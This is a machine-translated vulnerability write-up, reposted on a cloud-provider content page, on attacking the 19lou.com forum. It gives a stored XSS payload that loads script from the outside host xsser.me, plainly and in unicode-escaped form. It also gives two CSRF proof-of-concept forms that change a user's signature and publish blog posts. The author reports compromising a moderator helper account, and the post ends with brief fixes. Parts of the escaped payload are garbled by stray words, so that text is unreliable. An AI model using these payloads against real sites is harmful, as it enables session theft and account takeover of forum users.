Stored squirrel (XSS) on the 19th floor, kms on the 19th floor, and other super moderators

Source: Internet
Author: User

Filtering is not strict somewhere on the 19th floor, resulting in a storage-type XSS in a sensitive place.

In addition, HTTPONLY is included in COOKIES, and a small helper office on the 19th floor is successfully created.

REFERER checks are available for various interfaces on the 19th floor. For various CSRF interfaces, refer ~~~

In the forum, you can find a post to reply to. First, you can write some content and send it out. Then, you can edit it in advanced mode!

Upload an image and click Publish!

Use FIDDLER2 to capture the data of the interface http://www.19lou.com/util/keyword.

Http://www.19lou.com/post/edit this is the key.

 

 

In this POST package, attachments does not strictly filter incoming data.

After testing, you can directly add "> system error in the image address and return the HTTP500 error.

Visually, almost all [{}] and so on can be inserted in the POST with the UNICODE escape of JS. After the escape, it is \ u0022 \ u003e.

We inserted \ u0022 \ u003ebehind the last. PNG in The namespace.

View results

 

 

The vulnerability was detected. Edit it again and add your own JS Code later ~~


"> <Script src = http://xsser.me/UZH56T> </script>

I use this code for testing. The

In that example, after the unicodedefinition of JS is passed, the sample is inserted to the end of .png.


\ Users \ u003e \ u003c \ u0073 \ u0063 \ u0072 \ u0069 \ u0070 \ u0074 \ u0020 \ u0073 \ u0072 \ u0063 \ u003d \ u0068 \ u0074 \ Users \ Users \ u0078 \ u0073 \ u0073 \ u0065 \ u0072 \ Users \ u006d \ u0065 \ u002f \ u0055 \ u005a \ u0048 \ u0035 \ u0036 \ u0054 \ u003e \ Users \ Users \ u0072 \ u0069 \ u0070 \ u0074 \ u003e \ u003c \ u0069 \ u006d \ u0067 \ u0020 \ u0068 \ u0069 \ u0067 \ u0068 \ u003d \ Users \ u0069 \ u0067 \ u0068 \ u0074 \ u003d \ u0030 \ u0020

Smooth insertion ~

 

 

Http://support.19lou.com/forum-10-thread-229001343815994430-1-1.html

One of the victims has successfully attacked a small helper ~

 

Various Permissions

 

 

Results.

 
 

Www.2cto.com

========= CSRF ==========
Change Signature

<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://www.19lou.com/user/sign/save_sign" method = "post">
<Input type = "text" name = "sign_text" value = "XXX"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>

Blog posts

<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://www.19lou.com/user/blog/publish" method = "post">
<Input type = "text" name = "subject" value = "TITLE"/>
<Input type = "text" name = "content" value = "bodybodybodybodybodybodybodybody"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>

There are still a lot of visual CSRF. Check it yourself ~~~~

Solution: XSS:
Filter unicode escape of js in attachments, filter "> and so on.
In addition, for more information about HTTPONLY, see HTTPONLY (http://imlonghao.com/post/2012-08-02/about httponly)

CSRF:
Key Interface Verification Information Source (REFERER), with random TOKEN information in the form.
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.